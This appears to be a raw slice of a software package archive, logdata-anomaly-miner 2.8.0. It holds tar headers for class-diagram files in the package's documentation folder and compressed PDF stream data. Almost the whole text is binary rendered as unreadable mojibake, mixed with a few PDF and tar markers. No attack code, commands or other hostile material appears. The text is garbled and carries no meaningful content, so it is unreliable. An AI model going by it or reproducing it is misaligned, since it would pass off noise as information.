xePj0}WcB4K,IKP쪮kۅw\&9g.gZ@P@)WWLlCqw:M~dK:*(ƦjĴU=av!kCH.!%%Ҡcb3O0LT÷fqF&ʹj]m|iZ\:g\jeGG:RO/9M,>kv}rIJ(ŪR澺}7:+r5r}5(d 9Nd~vRLxb?s&~46] goy0鐗ypH5==Z'БGO +p9.u\Z H[> stream x%qa{V$B P@I! ܆=E"bNi-nN^^skɘ2޵LʔLˌʜ˂,ʒ,ˊʚˆlʖlˎʞˁʑˉʙ˅\ʕ\ˍʝ˃QZ=~߷qIiYyYEYeYUYuِMْmّ]ٓ}9C9c9S9sKk[{y< yCF endstream endobj startxref 57992 %%EOFclass_diagram.drawio000066400000000000000000014150631500476301700345530ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams class_diagram.pdf000066400000000000000000006344031500476301700340370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 6 0 obj << /Filter /FlateDecode /Length 50968 >> stream x[J~~E>Jrsss3 tjatlReIe1NjἄS?ݎ[T`sw\;G/,,(,&D/TLCo |n^)/J IEuRvXZp/r]lD/_?_zI/__Jm/]mz!*iIaE)/~jɜ%xc",l37-|)Q}Kfl?UYD.%;\ggW! ήB.rqMyC..\g(pw)pw)pw) s]"MR.R.R.Φw)pw)pw)pήB.4; ܥ] ܥ] ܥ]bMR.R.R.]\wIhv6KKK$>; ܥ] ܥ] ܥ]:; l*pw)pw)pwI}v6KKKd:; l*pw)pw)pw}v*wsnIggWKDwsń|v6wsń9p7g]\w3oJ, IݒdT_-ZHyJXUWo`^_JVWe&+6Vrmu*{6׵ Ų] { -kD}WVScM.$#dhJEԸ묭 {lk}\]NYT`.r\r^GDs~']BWm_Dķ)ӏ ?__/ӿ?˚_zXd[+:=8%%|{k-nhy}3)^ }p>sHћP︢{[_x­^>dhI 87t2z<.^ [Dy;;=y\w+"L7o7~d٪=>?y`WoWЧ޼.,%Sݼzͫ%<?˿úBuLz|X֟q??W9YrSs~=_=9'\> w}~a?6_Mμ6ؖ'*-}`nW;޺y/Wkp cu ,DZoR_^lnwF2ByI(}|6\ t99>u'[{eZ 旜R?o|.;@wڋ?@8=i?xۭxw\{~ⵉvXFL&8v!(# e'[edk3AvT̠dk3Av 3PlM`N&0 &! 
30d5f`>ᘁcΓ 1dnel`lM(q,l={ք`2:ٚ 2fi"c32ٚ 2f}1 '[c MC 321#321#321l@&fdbF&fdbF&fdblM`\id;21#321#321#dk3@&fvdbF&fdbF&fdbF&fvdbF&fdbF&fdbF&fdDN4 c22ٚP,X'!Ldd"#D&lM`D4Ldd"#DF&rvd"#DF&22Y'[2 MC DF&22\|DF&22LdfLJDF&22Ldd"Wl@&22Ldd"#Yu5 hDF&22Ldɶ6,-۫+/ZU%o&'ӧwl?1AռԽS~Zwy聯8u/:xoEJnN{pU ;»v=4to寪v{ cw} .ejKyW3=龾-_lU4<bٕ=)b/%"R{Dk*7M0k= = R޾N?HEDYܞeIJKHj_Xlu r=ߖZu:z/oRh٦epu4!`/߼HR˗]|MŤ^OARJVGx0t^̋UxZ뻭볿֥#KZ'.uf!)S$̵%)SVwݹ>jXR/j.vZN <2im;wF>XDN<^5qڲ*R;:/~ש`bBJ 1Sxu>Eߌ/%cul.}╋WU^~z4웅pcS.^x5˹܄aߔ˹Dؼ\M<z9z9pl^έ^έj4s˹)Eþs˹Dñy97z4v97q4s˹Fñy97S4~97K4s˹Gþiu޷Ӷ ~$4xmD Pϱ " XD#QӶ|H4xmD%0ϱ p"D(Bip@)r<6T"`hExL2*2*2*'xmU^eU^eU^嬃m22*2*2*29WxWxWx B^eU^eU^eU<6*2*2*rӶ|WYi '+0YxR)cy]Qo9?ڏTzlEJް:#cPvhY=W޿rݵl;}m׺naۮw~nʱR҆luhIa7\0 Ƹŵq@yI[Z%n;#yp!ᘓ?J50WAW:sTŝ kDϟ857+cQW]ֵ7eprJWj[ϳJ᷾j[&֯l굩Z埣 \I('4P'gWBXN O΋PNC9r!Jr!*B.5R}rv! (O΋ hEur^TB.F+ Xdr^TB.擳+xyr^TC.0Iˮ)II('4P'gWa.΋PNC9r!Lr!,B.9}rv!0O΋ pȅur^T%pW Mήw%pWw%pWw%pWOήw%pWw%pWw%pWD'E\w*pWw%pWw%pWw*pWw%pWw%pWwEur^T%pW&gW+++擳] ܕ] ܕ] yQK ܭ&gS5p[wknM>9 ܭ5p[I'E\wkUn ܭ5pݚ}rv[wkn ܭ5pN΋ B[wkn ܭ*p[wknr ܭ&gW5p[wkUn ܭ5pݪ:9/*[&gW5p[w*p݊CvxɺN -Rk'ټrOи:78OeN+z^;.LoxR~~{ #~\_ء^r.ixl۩Т{6@FW?bچn䚎v5(El]`9/ـY ?= 0~*^QFzrǺڶq{6ʝ>AIR^ZgݚoC׉f'+>@w7x ;|6Trnv53IZ_bLbr=Y-n~d¶?}#ç-Y}Ws/} Y[O6sc8TK^_/xSʞq 1dRd);Z^2MM6qBmMevle )e dke eC# @8;&8gykR>}4Vݵ/\‹4 u_ѧ^AO+7/,kk俺IQ1TlM`3:ٚ 3PlP@1fd;aO&0 L'[cN8f2ٚ 3plh lMQ, @J4LTd"DE&*d;2QLTd"Y'[2Q&!LTd"Del@&*2QLTd"dk3@&d;2QLTd"DE&*2QLTdVlM`DUl@&*2QLTd"U}DE&*2QLTfLTvd"DE&*2Q'. hDC&2ѐL F4L4d! hDC&d;2ѐL4d! hY'[2ј&!L4d! hDcl@&2ѐL4d!dk3@&d;2ѐL4do7,vXVcmki}oԛ߾.Gr9bnMR=>5m_iPkWum'#nWtݶJFW[ti꒫X?])|e?kJ2J굌&Y(2h[ҰWY͌]N'|=]Z?}WsUi%iڱA8JdʜZqY:qM!`2:ٚp(e&!`lM(q,3(AfP0 @0v 3lM`OCT̠b'[A N&0 &!3P@e5(f>aaƓ 0fd;cL&0 '.(%Rή$PNggW到l8PNfgWy(糳r!̳Kd]\84; \XfgW!ΦJȥ\ ήB.%RtvvrlJB.r]\$">;!r<; ԐKUEC.J) hEevvrѐlB.r1]\,b:; xiv6!ήB.rq] ܥ] ܥ] ܥ+̅whv6KKKD>; ܥ] ܥ] ܥ]:; l*pw)pw)pw}v6KKKTtvvr %T.R.R.l*pw)pw)pw*KJsWU}c{!_c\mv;pwylWuB=I-{p[}'߰۾2yZJ]K,-umZ6`^ߍ~~M-%5^!lP^rtSm;ؿ̃g5PNloTŽ5ggI]^:%s]֊Uz7,JMO:ǚnj Ǭ֦^JP嶩z]EgS Nr%+Y(g\XUȥ\j]\4iv6! 
h]\46;\,ήB.r:; xlC.r2; xmv*'%'PU j(WggWK&PPrevvUC9 lv6C.9*C.ήB.r4; \ήB.raMK <; RggW!,iv6wsń9p7Φwsń9p7ZggW!ݬiv6wsń9p7Φwsń9p7fKn4; ́9p7f8pw9pw9pw9Liv6ˁˁˁL6; ]]]uvvr eN]]]eT.r.r.rK.KMr.r.r.Φw9pw9pw9pk]\wYl*pw9pw9pwYmv6ˁˁˁluvvr eO]]]ey[wKn -%p:;\Jn4; -%p w+yrJmga'a{; sXeօ$I5jyn kYI{|o*k{m6v~ݷ͖}a6^7Ҷvmtv.5rE=UBt[Ӗ8+7LvA( S6UkfO:<}mrom7J҅:܀TBNn̛n9D+kB'i~~g@{ՈMzKiY]@iJ~{x=~:-膈v ˺;,Dd^zpzwƧz\+$&CO [Eݏ%=J^:8M$ٕrlJ c9ٕr*RC.fgS5RC.UfgW!r>;Ґ\ggW! ήB.r1MYB.&\ggSr*!N)wrJC9|v6ErJB9 tvvr!Lr!,KdMqȅC.̳ \XggW!])4; ܕ] ܕ] ܕ])>; ܕ] ܕ] ܕ]]\wl*pWw%pWw%pWwl*pWw%pWw%pWwEuvvr TJJl*pWw%pWw%pWwuvvݚhvJC9 dvvr>; ܭ5p[IggW!ݚiv6[wkn ܭ5pfM[wkn ܭKn-4; ܭ5p[Φwkn ܭ5pVU%pVM[wkn ܭggS5p[w*[fgS5p[wK,/Y2^5O%ۢ%W_Zzf_IzV0NNYƸ:D|R*a̜׆%V~Ro3kRs[h?ņRD 3* ÇL-D=K ֶm^lv ?C.[ݐr[lYwn{9+o>+Y1)\F15]G7,z\G1W_Sa!\t]= 2K\+.8+y\jn| ~ӯN|{ID/__5/Jۜ;Ot}#VsBԜ^h]7o]׶y[n|'7mor]!p{\?v{ 5L[%~!oŴ{pۮqUei]nam[\q2Goj^ƭ_g\x[%"DUPEWj>ƭM%R4i+^)sYK^9c\2ItuV˜U>iMvM qrΦ8r%+Y(g\XUȥ\J]\$"iv6%! H]\$"6;!ryvvr!ZggW! hMiEC.ZfgW! Φ,b!˳\ήB.r4;򐋇\ήB.rqX\]Pruvva.Φ(r%+Y(gr!ggW!]uvvr 5N] ܵ] ܵ] 5TZZZKIMZZZஉΦw-pw-pw-pj]\wMl*pw-pw-pwMmv6kkkfuvvr 5O] ܵ] ܵ] 5y(]]]OuvvxSMzzzஓΦw=pw=pw=ps]\wl*pw=pw=pwmv6끻끻끻^*fgS끻끻b]]]ZggW!]4; ]]]WMzzz[]\wl*pw=pw=pwmvwAJM-UՕiOoK?l%}i믭"&K1 W>˒p?H~? =1}oye0~/TJ]l˼.r;|]uCi[{K:1v9jEoN1tV⽎>Fǯ]7G]9묂ϵz,W;YgYrx *_ut8]&}Sǿ/oϽYN)uk{{/uy]H<ף][ ϫ>}Ayg_Zz)\j|vJ%詞A7>Rߥw=## ݁N%1IO}VrZ=m|6.wOTDBYZ:HZ,oӧg@-E֩:Jv~Uv9{w_Ry"gGYwT0b|oh1E1y 5#OL}nU>q}gc2k뒋tҨ]=V PwGE߄{咙S,|eDKZ*e*/ɟoF^,V eZ Пڟu\?o>{8x[N ̷̅Ou Ӈhg7Lxssχ^_g'2Om:S]۷Lݵ]5=^?Ͼzjח_n+Ch]uޛE[Ȅ&Ǿmx`s3\9x4&m/ ƶzl&y= Wfypm6[#ŗJR^T!uϜЕ *qV-?7Q>\YuwK0uARӥK.TZ>o)jutk bR(÷>OӚ&t$k[{:+Ѿt_\DX94Nqzt>EJG_*zm]^9պ ̉xmBA((քC"(C4AedkBclȘA 2O&0dlM`0MC0fdk3`̀}`3(<ٚ fPt5f 4!`" @0vT̠dk3Afd;bL&0 '! 
30x5f`:ٚ 3plp1fd#DF&22t502&!Ldd"#D&l@&22Ldd"#9dk3@&2d;2Ldd"#DF&22Ldd"lM`Dl@&22Ldd"#Y|DF&22L䪓 JDF&22Ldd"OC DF&22l:ٚ 4Ldd"#DF&dEA&dbA&dbA&dbI:ٚ 2MC  2  2  2OC  2  2  2dlM`4L,ĂL,ĂL,>L,ĂL,ĂL,Rt5 d;2  2  2 d;2  2  2 KfL,JĂL,ĂL%3=W{jڙա E{{o!$tIz$>bȧK;;kz9 K<[;8^~9?ӕ}CkM5w՛NZ' ݙˮgXHc١7Q<_.fk_iN}v<5pCAuqwϋ8ErɞK7t/oN{"]54 _aǙMÏ7.ou":ow"Qğ9/?URۺsm1<7KY+[aڙ[f5G*OVxcWLU??}?0CƯΟ[~ʵC⁁>zhڏBkc"Q%'Su1u-O.rJiu5 -ZrupbσӵG({r[{?oAg|P85֦LORK p1Z\O[2_]f{F=Y1x _k(|)zws_'~$I>|nm[_.~^[ں_+ʢX=nm̵q}|=w旷sҲ9nmZG]@潿Y]:ؠfד=_biK%q(rGyi^\ۛ<ۻg|![Ռ׶Myp9|n/T,ԵȺ,%g&%}/g$-io_=C7i/RA?^' z{g}nbI[-BZ&/6{9ץuxƺ!?s2~֣q ԟyX^h ؗu3^I"2ת1 Zu}Ej:4PkΞ/JKYZrI3낞o=V/{׮d9@JQPNB9]i(硜Φ1#]I(ήB.9iv6C.9evvr!쳳)pȅyvvr *RB.fgS%RB.EfgW!r)>;\ggW! ήB.5Riv6UC.5Revvr!곳) hEyvvrѐ*b!ٔ\,b2; X|v6!8ήB.rq]a.kf8PNfgWy(糳] ܵ] ܵ] 5U%p2Φw-pw-pw-pײΦw-pw-pw-pXggW!]+4; ܵ] ܵ] ܵ]+>; ܵ] ܵ] ܵ]]\wl*pw-pw-pwl*pw-pw-pwMuvvr 5TZZl*pw-pw-pwuvvx'>PNB9]i(硜Φw=pw=pw=pIggW!]4; ]]]>; ]]]g]\wl*pw=pw=pwoo眗?o}e9xfY\YGO+'N6f}i"T?iYz}Kn$Iuy[ۿ~ W!~W{ċW?WwkW 6KMʒ).ɒ=Wʷ.lz-_8-<5Js_++.V$~Eȶg]l{{z[u 3]Q,_Q>ӗ }jZ-+>c;=[[xԱ~uCz>RNzIVɭۭzNw }d TbϪO\)o,N2usv":v%Ya>f={=1Ia#f:=>vOk 6'IEuEQ4[wGݵ>j[ve W\eŴc,iAU:Mɼ:Vgw;]|MS~{ojvv]8iIk5ZzJ*AӄvMiJ(WfgW5PfgSe,gyvvrUC.fgSr񐋗UC.nP0MˡPή0%PPrevvUC9 lv6C.9*C.ήB.r4; \ήB.raMK <; K\$Φ$"!)\fgS5RC.5ήB.Z*fgSj] ] ] UKzMjjj஺CYZZZ+wl*pw-pw-pwlv6kkk*kfgSkkkl] ܵ] ܵ] ܵRggW!]4; ܵ] ܵ] ܵ]MZZZ:; TZZl*pw-pw-pw*kfgSkkknP끻끻끻 s]4; ]uo7ՃHh[95ۯvRZћq^e ~u81q[o:v+UxsE:2(O:e~+Bk)1D$ Qy,wpQĩc=o)r#@K%ϝ*p]i[9ۯ6_wnwow{5ܖBZ^ַL^HӺ:~j &Ml:b_Ά7Ee%lʜu>!: qw?b <4/-=)m+3I>nj-KbIuZJjrj :v円f"YDYׁךwZ)ߥwtkӥS悫KXN ۏM@bC~J}mHj-|W|w6zz)'ή4PggS\e,Wyvv%r:; hEiv6! ήB.rQMYB.Ƴ\LggW!8Φ;!r<; ԐKUEC.J) hEevvrѐlB.r1]\,b:; xiv6!ήB.rq] ܥ] ܥ] ܥ+̅whv6KKKD>; ܥ] ܥ] ܥ]:; l*pw)pw)pw}v6KKKTtvvr %T.R.R.l*pw)pw)pw*KJ] ܥ] ܥ] %T.R.R.*KN] ܥ] ܥ] %ٚJz.$qemmUM(2@v/fA֓Rn&]>/+9gM?d.dMu˂dzq_e%OʣK&cWιxqזԼ{ p34Z0ݓ@ >(uu󨓦dKy=|GM֎痭q.#KY\\'lT&m~x̓^Oke7}x/ʰOdڶʵ[]VI(yKdKU.5"Ƽ[uM$2"~)= noj{镗8Ү3+`~L)c=S޿-J#~>tY_.%wXC Nm  :fkօb2>ښe2C̣ 2etu0f4ښ`̀1fhk`3(<ں fPtuf 4ښ@0f hkb3<ں *fPuu(f4ښP@1fhk0 G[a 1քc.0 G!,A. 
2etu2шF[DC&2ѐL4d&L4d! hD:ں 4ښ@&2ѐL4d!}5L4d! hDC&ZfL42ѐL4d! h⣭ d! hDC&2Ѫ.0d)&L4d! hDSmM  hDC&2ѐf:ں 4ښ@&2ѐL4d!}‘Ltd#DO:ں D d#DG&:2G[DG&:2ёLtdgm]`DgmM DG&:2ё>ښ@&:2ёLtd#h3@&hkDG&:2ёLtѶہ5Uj'9/E˺b2>qBER:켩ӪEÔa[#|7nTRqn]~ceou9@{8&zϜĠ￷ZJ XBe!3v^$ښ@&dbA&dbA&dbQm]`b4ښ@&dbA&dbA&db1mM  2  2  2. A&J&2eduXƱ&Ld (D!m]`D4ښ@& 2QLd %hk(DA& 2QLfLB d (DA& 2QarrZx{yIyFik˗5-(_\}tyӻN3N hu⃫5烴ZŅ© $#[/v-] ܮ>xS?>JWօjbz7\&e'Yo҉~kZ$!Z+7,@ν;o\~`zUm["b c22ںP,XG[DP.(f1Ld h3ȘAc0.0 XG[A & fP0" ̠`G[f <ں 3m]`34ښA .0TmM(fh3P@uuf`4ښ00f`hk1 G[c Ƞ Kі'ehBcmM  2  2  2.0db4ښ@&dbA&dbA&db>ښ@&dbA&dbA&dbam]`Rh5L,ĂL,ĂL,R|5L,ĂL,ĂL,":ں hkXXXhkXXXEuu hkXXX|5L,ĂL,ĂL,:ں (F[n0,# 2e|5Ld (DA& h3@&J2QLd (G[DA& 2QLd.0dmM (DA& 2QR|bn B@Pf6[/-ojKV>ucS5\^ItP6ו1Jo#Q)VѶ{ W=ߌM`Yme7l[1oZŖj59vW+geP:j9vCPfhuYdA~3vǹP/_4#\]|:QYzqɥuR8oS\=ٸ #?RN_t/QRo]6h]?`m](q,㣭 "(C eG[eh3ȘAD 2feud hk1 G[c ̠`F[3(AfP0⣭ 3m]`.0TmMT̠bUF[A &3P@yu(f:ں 30mMf`h30|5ᘁcΣ 1dP5h c22ںP,XG[ĊLĊLĊL X3&XXX&XXXYG[2mM +2"+2"+2mM +2"+2"+2.0db4ښ@&VdbE&VdbE&Vdb>ښ@&VdbE&VdbE&VdbUm]`j4ښ@&VdbE&VdbE&Vdb5mM +2"+2"+2. E&j2eduXƱ<d"D%m]`D4ښ@&*2QLTd"5hkDE&*2QLTfLB d"DE&*2Q<d"Dm]`D4ښ@&*2QLTd"hkDE&*2QLTfLT2QLTd"mT$tM늩kKzlR{6;ߴ*۾5as7\=xwE^{׭ )u|=6vln*sR[R*%8y +feaOyk?tT.Evu豷!RjTJD],Wcm,r\ڋq7Lw2mlpKgk$uviL3;n; ?k&ijVRQ}4SSָ?jEOkOBFmX|}SO1 08+ bt&Q?iahد٧șM!6[XF.8D&(dm]Q, ̀1c.0 G[3(AfP0 @0ք`.0 G[3AfP1 @1քb.0 G[f`<ں 30m]`8&3peu8f>eAO. 2etu02F[DF&22Ldd"&Ldd"#D:ں 4ښ@&22Ldd"#}5Ldd"#DF&rfLd2Ldd"#⣭ d"#DF&22.0d"+&Ldd"#DVmM DF&22l:ں 4ښ@&22Ldd"#}  2  2  2$m]@XF[ĂL,ĂL,ĂL,䣭 dbA&dbA&dbA& XF[ĂL,ĂL,ĂL,죭 dbA&dbA&dbA& XF[ĂL,Lm)-Jio.Y ,?JQ?jϦi;~NL5&{C;NKyѡSϚ1[뾹MbmK=ArM2:=>ܳ]y'g6_MJ7ʈxiZϨ'tj Ce77枿^9ULoߟjD}e,E%ZiG[7juN2%z෎xvuIidzRyv^6۔^D~zgAq©c[:TkmB.xoBж& b,#XFF[ehk" e2.(fhk1 XF[c죭̠h3(Af hkB0 DF[`⣭T̠h3AfhkB1 TF[b꣭ 30m]`.0 F[8f2ں 3pmX[zmEu!XF. 
F&2hkDF&22Ld2Ldd"#YG[2F[DF&22Ldd"&Ldd"#D.:ں ,4ښ@&22Ldd"#Y|5Ldd"#DF&rfLd2Ldd"#꣭ d"#DF&22MG[2F[DF&22Ldd"CdbA&dbA&dbA& Ƞ  hkXXX|5L,ĂL,ĂL,Ēuu &Ir\[Ҝ*|gؕא"%5K HpyD[;MWȏ$~lDF&22Ld2Ldd"#lmȒg[DF&22Ldd"϶Csy9b%_+W[ӭ +[_;o#}x?>vlK;֣ˎ⏳Xx.IcnO:Z+S[Q-^OL砿Pwr׽,(ݹ`D5V.AjPMgN܅puvl]%oul°cm]P:DPh f@6ۆ 3<ۺ`̀16flB0 f`bm@1ͳ 3PmC`϶. 30h f`6ۆ *fPlb32ۆ *fP}uᘁcNm16do<"r a:2ۆ0Xg[27u2Ͷ!ֱ6fLg[DB&2L$d"m]  HDB&2D6ۆ yuL$d"! HDB&lHDB&2L$6fL$ͳ d"! HDB&2g[DB&2L$d"Ͷ!0d"<ۺ@&2L$d"!lHDB&2L$6dDNy:ud aXDZ϶.Ldd"#D6ۆ \lDF&22LⳭ d"#DF&22f29϶.Ldd"#Dfm] DF&22,6ۆ yuLdd"#U^^u!Gߜowyb_wӺ*URyS)ezC21rY~}]⏣X5ٖf_OZoڝ{Qo\8?imrmbPE!? d/?ү I"+W} OMOyr|m5SW⏳> P;qE(խ<ֶ}Tۖd_zI<076L7}Suj^n3/opyY]G;r]%R[/Wsm@7\d ˬ/xu>w'D7+ݰz݋t+]pG_-* *1Z"c鍃%2\zVݔ~{{k^}lLg>޾>k _5>|+fu7п溺`S>W>_1c )Y^[l^tp<" f>C_&x6luLZ^*>@;/,խο=ݢi3.^ߊ-y넛~|͞\_wZ KG)շ_o%3 WJ:P]~uǗ,LQzhx7S)W6%-}w}Ẍ́'y1϶l$T,C/=ß!ir*mK4?NTzxrCm2yzs=N7e&O/ߎWx2z~L^6;}|;^ͷ=e&O/8ޒ'Y.pe8[|e%8^pK6yzx9Op 2yzx'Y8^< +pbxW9 ǫp*xW}e58^pk6yzx5O Rx+^isW Rx+u<|;^^YʓNe'Y^ʀW2,e8^qLh/[֠m!RYDRb~jݰ^XTL6Y8i}68'yoEZyoTڜ/8Tok,#w9o?oLe]r.{󨟆˳zDTpy?M9 dr9@[I+#g{Դ> Z*.oȔ9w~|I"G(,_y)@_{nޜެ1l~]. DPE !XǰͶ!x:g[NXG̶!0 g)NI!m:ul m=nurm]d:ud aXDZ϶. fP0Bm̠`fag[f@2ۆ 3 m]0fl3`̀m f yu!`"m@0օb(Ͷ!0 fag[f`2ۆ |uL,ĂL,ĂL,Rm  2  2  2 l;! HDB&2l 2rm]  HDB&2}uL$d"! HDB&R6fL$ʳ d"! HDB&2g[DB&2L$d"Ͷ!0d"Im]  HDB&2$>ۺ@&2L$d"!Im  lHDB&2L$2L$d"! Hf2<϶.L$d"! HDrm`d"#DF&22Ͷ! F&rγ d"#DF&22϶.Ldd"#D.6ۆ LyuLdd"#DF&2lDF&22Ld6fLdɳ d"#DF&22g!~~lgt\6)kډW|V_]i#>p^Lrr{G/`{wMy$D[8~隴"%~Fy.εnAsӲ;@ _6gu[S=﫩%sNRrҼښeI^(-Hd)R|5&I-Cs^vq bMTx>'^/.\~)8o&.0fvtM9k=?`ɇ @\%wWzWz8ՏTLz:PC=_] aBs( ,Գ9TȅB.WgWr *B!\8´: pȅmurٕ\$": HE|uv! (ΡB.rQ[C\,byuve! ΡB.r1_]ՐK TZC\jȥ*!ϫ+xeurBEw`mmgY_b'~b{QK{~m{k+ BwO{ssjMNOgjݾ4Ҥy|c>W+֚-{Ɨ{G/>A`3;jx#o9vxv P_9JXt KMhƒ gjR~`zIle}_@N;q9ɦ)ji_Uя;q޺ϝ󊗗n [geNlhB/k^~?r-Ui/c&jӏl߻3tɫFo陒o粿>~(>GQΡw[= dqޔzJ3SzJ$ԳPM\,byqe! 
,Λ X|qUC.5RiqTȥ\-Λ xC.rqY7rJ s9Ttޔz)E3r*S',ΛPC=_CK Z7r)!bB.r8 \HM\(B8 \M\8¶8o*Ps] ] ] UyS!]8 ] ] ]5_CjjjV[7r Uϋs] ] ] UٕZZZ%[7X8 ܵ] ܵ] ܵ]˾8 ܵ] ܵ] ܵ]+8o*kPkkks] ܵ] ܵ] 5yS!]8 ܵ] ܵ] ܵ]_CZZZன-Λ 9TZZ*pw-pw-pw⼩Ky^CZZZஹ/S=6m֤gXD8~m}y>?΢|.wֺ{k}$H[K=ގe{vziM.~UWtk|~=&j1c-)Y{P헽 Wߞ=|k+ߥu`wGQ`ir`k%ϘQ)҄{zEo [mBm U_5śY<եEnŸ yz_}./xLclYaqΙoWoN8Yw2廮o\uK>RFF>w>ȫ~?SN8EuSڷ@#;9;LZ绚.^ހ/7ʮ7м]/g0KT_q"cX[u4C͋JXG,. 8v 30Zl]`-.0ԼNQ1TYl]`3NᘁcN 1d 28E:uduaXDZ/Sd@2dp`Ba[l]`3(y`3(غ fP|0 [ad ̀1΋0fغ 3`_l@& 2QLd Elu Eb;2QLd (DA& 2QLd-.0dԼNLd (DA&Jv d (DA& 2Q["5_֑օa:NLTd"DE&jfLԒ)LTd"D-NLTd"DE&*b3@&*v d"DE&*2Q)LTd"D[l]`DռNLTd"DE&b;2QLTd"f 5/S DE&*2QZ}DE&*2QLTd`DKy:uduaXDZ/S  hDC&2ѐmu vf+#f:VǬ_^oXxVx[zS!3L4+RYJQ weGa[띵ك4kޘ[4u?Ѣiu4CK-L?/Ζ'd47?ߚ}~露sGyg\Grޒ(i$i˘|v֧9 ߾CWZc߁g~ܝ\dچ+d.#>N/$דksSiO}?M\Gx{ yM ;. 5 Y &_vO&v sWȸ+[}Y~/?}\p=NSy_y+՞%)v/s}Ku0e {iti׶~ćk qR[goNbexy^vO</rF)y}^R{D/Lt5%u=.KaIicV]z3A<.;S.bj͟nEZGcJ37z5[MHӽc/if7CIO%p~Ut~U{n%  m6lJX6[ulڀ;-6Ff~H7[-Kk:"f^׻>V|0/m*N,@zx1/0WM|n#~(p?Ƒr9 eCuՠϺE[Lmx~[_m6o>0q|"[ImDʲƢ[J>^y՜g͏UlݱoWy\k*+ Ϙ#Vc/uXj_>X}Z7U"_g/'_p5 _rGf_-/ۯ>5'ٗ(I"5]^޴ƥVzT7*^%^nCttD r[~\⯻^EogS?Yq,S?'O/++9˜n~.7? ~N^8^I,  O^8^,+j< ǫpx 9kpƓx 92yzV< p&Yv8^u< p^'Qt;^N=e_'O/ߎx2zr.geks=*sR;|5ū_rwWbg͹]d-S~QzMk[['+mSrިں">Umu~U. #V|Q^6NrWE^/Ւqj22z[JojFN}'No?q~oqKNiJӺ$E[}վюmo+!ާ'e?Y1tdei 5пp5Du#ȝYb'>PS qO_Q<<>E'1-qf/3Nr\֛mnm<˴ 9V; D@aP~fVx[bRgKM+x}#T_.:z;lm/N\ntu'|kiia{bp=%D˓VPyj`]"n '>J4&m7"i33j},xd@؟oᄐ)^-)7ץ_ށtlP|CiWzyZdgO_c;m63?pv?B,r'5Ή14wH!1DgZݒ%i[8ߍo~}ܻl0&FM&xPeLz\mƻ3`c*m }gc_?A+g8gS< dm.zw[;z4p[Jʶ%nWK-l_Ix~"L!)m|r}1&z~{j,xog-8YX7MŮn.[_yvlPZ^m-Y`Öfh m7>qyZ{|Ik+̐m+Vq~ycw~0Cg?%_yyq0J==?I;69]1[> mm.vr:?0/Tr:g?lVVZ_wv~v_N^bFi}3*8&kgX3yN\__e_'O/:sx'O/:s _x2zz˷vG=g93yN\x o)x opKie%8^pKuee8^.xu2JewSr۰@K-k.{Ab?/x%k;DR궯SJ۵@c_6 TwQKfߖ=ϔ.[Y\B_9lym@yvvM/UHʷTiɓ;u۸`@{>YWG=|qtJ7(~ AQ $ԓ9z2#zDs( ,Գ9TȅC.WgWr *!ٕ\$": HElurѐٕ\4䢲: hE}uve! 
ΡB.r1[C\jȥU ԐK9Tȥ\ήȰ6-ln\hH/ 37r1 w>?DrAA1`01̄Lv6̤&_;YmjKq&߻R P2 _]Nx~eQjKe_8?rPc @e~﹝~wvFֶ^QW+d5pkI5-'VlMSk,gNwϾ`(Dn7Cꜟx:%PWPPήJz`RVPis \(ή(B!9TȅB.TWgWr 9TȅC.s\$ή$"!9TEB.RWgWrѐ9TEC.s\,ή,b!9TB.VWgW5RC.ΡB.5Ruur񐋧ٕ\<: x<0>X6ؼ$nŕF>=5i?rcHO?%>P;Vs{*ޖ~g7{ʦM5RcQAT#rhVH4]jO{tFg] RHN[Bl~N"jyLlD^ _%ke3/S:w UZӴcڤ BP8)"غ(ul°cm]P:DPh f@6ۆ 3<ۺ`̀16flB0 f`bm@1ͳ 3PmC`϶. 30h f`6ۆ *fPlb32ۆ *fP}uᘁcNm16dHulBXG̶! 8E ں:fu l3@&Rɳ d"! HDB&2϶.L$d"! HD"mC`D<ۺ@&2L$d"!}uL$d"! HDB&l3@&2L$d"! H곭 d"! HDB&2f2jm]  HDB&2T}uL$d"! HDB&l2`d"<ۼ`mCq㳭 d"#DF&22Ͷ!0d"<ۺ@&22Ldd"#lDF&22Ld6fLdγ d"#DF&22g[DF&22Ldd"Ͷ!0d"km] D&VUҷ*5fZv26 64/ K*V]/.VTuix-ٗfOq.[_o~G]n~yz6h%q_3_sW󏻗g7@\USZGڡHnmQY2^įm-[{œ7"K/ou 1k8=zQ쁳gg\]_\/9N{Ԗܯ }YR67J<=w>G>0twg|ogq~g6JZ偳L~eˋfl^Dߛ׏'.'ԍGOi}8r>xToEsO?KJm,HPܶj|Ym}f؁/|pZ_rZ岎w[݃qw!r0t$m!GWZ =_z`|K|sXI>T3~fKx·CU6m߽|X|7~b/h?0^qMc/v_1ؚTf_yda¶gHۗa_ﮱ+c<zoJyB'# 'X3[Y28%5=pnU^w|.DߏZ"vojNޥ >'?zޝ_gEWo)%iۋϏ :Q6?14!ɫ_~yr1k.5:x}"lV,G 'R?!^6bK# Kv~LV v?*pWnvQgk.yl/v?}%n@/:.X>C_W<[APnb#;g~NϏwy>s?R>pFާ/Z_#{/It#jg I7OhmGmV}ovo|` _n^ҶhN'޸ ?IIGϰOG>ok3nm:mE^4zo@4O;W睗\y@q;/<~7B%qS;-׷s“u+y9'9K=N ߺ#=mZzZ txnc޻^mAvz-v)saUtsFq|ϣ޷LoұQqs $}?_q[sjJxӟ*Q_|ϥM۹3wÇO}mʴ[I/ݯRnYmTl~mmIoMwFGQTxiDxkm}DmRF-H_^GO[$WVwщU[7a/߆(粙|R_QB[9v_ʺ- k{h02 lFKZAoԬZ%OM]k Gz׶Um)H?m$yUGۻ3ǚI]tAU *:qǫs( jWWgWgeur*RC.5ήjȥ\*ΡB.5RC.r: xuux\NzJCU\z?vǎϲ6f_,_ڿ=ֿ{kj|z=0!G˙UA?(d8=ãe:=|Cy4%B xVxyUMy&z}X֐31T:CUnzή[=xu^ J֓ΡB.r]C\4iuv! (ΡB.rѺ:\ΡB.r1]C\jȥU ԐK9Tȥ\j]]yC.^VP!Ρ00SEg+z:Pzuuv11SEPisK :*!r): K+ Pȅ*[HWP!iuv[wKn -%pp]][wKn -sKnѴ: -%p[ήwKn -%p9T%pԴ: -%p[j]][wKn -s(̅w)ՙJǡΡ4ԫ^]]R.R.R.e]C\wU.R.R.R] ܥ] ܥ] 